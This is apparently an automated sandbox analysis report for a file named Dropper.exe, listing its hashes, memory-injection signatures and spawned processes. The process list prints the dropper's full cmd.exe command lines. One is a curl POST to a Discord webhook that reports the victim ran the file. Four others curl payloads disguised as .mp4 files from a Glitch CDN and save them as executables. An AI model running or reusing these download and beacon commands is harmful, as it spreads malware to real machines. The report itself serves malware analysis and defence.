Analysis
  max time kernel: 119s
  max time network: 120s
  platform: windows7_x64
  resource: win7-20240419-en
  resource tags: arch:x64, arch:x86, image:win7-20240419-en, locale:en-us, os:windows7-x64, system
  submitted: 22-06-2024 08:13

Static task
  static1: 1 signatures

Behavioral task
  behavioral1
    Sample: Dropper.exe
    Resource: win7-20240419-en
    1 signatures, 150 seconds

Behavioral task
  behavioral2
    Sample: Dropper.exe
    Resource: win10v2004-20240611-en
    28 signatures, 150 seconds
General
  Target: Dropper.exe
  Size: 13KB
  MD5: b893cd6a15c7c066afed84a3cfbb5367
  SHA1: 8b147ed2063ffea51ebd884d476410541405ef95
  SHA256: 6207d9cf72b8a1a656ebec2a1aac8476cea35ee877895bd788c2e4998aca6920
  SHA512: e1299e328d33243cb52d11dbff2c04903f54409d0e6b2f855ad7af18c3c34d619482db67800dd1a49bf2c6db816e3f86c52619c2a538b455e800841cc5209733
  SSDEEP: 384:QMEPpIezni333CSlPmbptz6RLZLf+pfolcfAhDBVCs0:ipdm33CSIbD0LHGAhDBws0
  Score: 1/10
Malware Config
Signatures
- Suspicious use of WriteProcessMemory (20 IoCs)
  Processes: Dropper.exe

  description                       pid   process      target process   events
  PID 1700 wrote to memory of 1812  1700  Dropper.exe  cmd.exe          4
  PID 1700 wrote to memory of 2148  1700  Dropper.exe  cmd.exe          4
  PID 1700 wrote to memory of 2404  1700  Dropper.exe  cmd.exe          4
  PID 1700 wrote to memory of 2644  1700  Dropper.exe  cmd.exe          4
  PID 1700 wrote to memory of 2776  1700  Dropper.exe  cmd.exe          4
Processes
- [1] C:\Users\Admin\AppData\Local\Temp\Dropper.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
      Signatures: Suspicious use of WriteProcessMemory

  - [2] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"

  - [2] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe

  - [2] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe

  - [2] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe

  - [2] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe